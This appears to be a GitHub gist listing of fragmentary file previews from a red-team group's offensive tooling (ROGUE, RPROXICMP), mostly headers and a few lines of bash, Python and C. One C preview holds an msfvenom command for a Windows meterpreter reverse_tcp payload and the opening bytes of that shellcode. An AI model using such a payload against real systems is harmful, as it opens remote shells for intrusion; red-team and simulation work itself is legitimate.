This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if [ "$EUID" -ne 0 ] | |
then echo "Please run as root, are you not trusting me? :)" | |
exit | |
fi | |
if [ $(grep -Ec "Kali|Debian|Ubuntu" /etc/os-release) -eq 0 ] | |
then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*! | |
* | |
* ROGUE | |
* | |
* GuidePoint Security LLC | |
* | |
* Threat and Attack Simulation Team | |
* | |
!*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# ROGUE | |
# | |
# GuidePoint Security LLC | |
# | |
# Threat and Attack Simulation Team | |
# | |
import os | |
import sys | |
import click |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
D_SEC( A ) NTSTATUS NTAPI Entry( _In_ PVOID Parameter ) | |
{ | |
PARSED_BUF Psr; | |
UINT32 Wrt = 0; | |
PARG Arg = NULL; | |
LPWSTR Nps = NULL; | |
HANDLE Pip = NULL; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context); | |
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context); | |
// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c | |
unsigned char shellcode_bin[] = | |
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" | |
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*! | |
* | |
* RPROXICMP | |
* | |
* GuidePoint Security LLC | |
* | |
* Threat and Attack Simulation Team | |
* | |
!*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*! | |
* | |
* ROGUE | |
* | |
* GuidePoint Security LLC | |
* | |
* Threat and Attack Simulation | |
* | |
!*/ |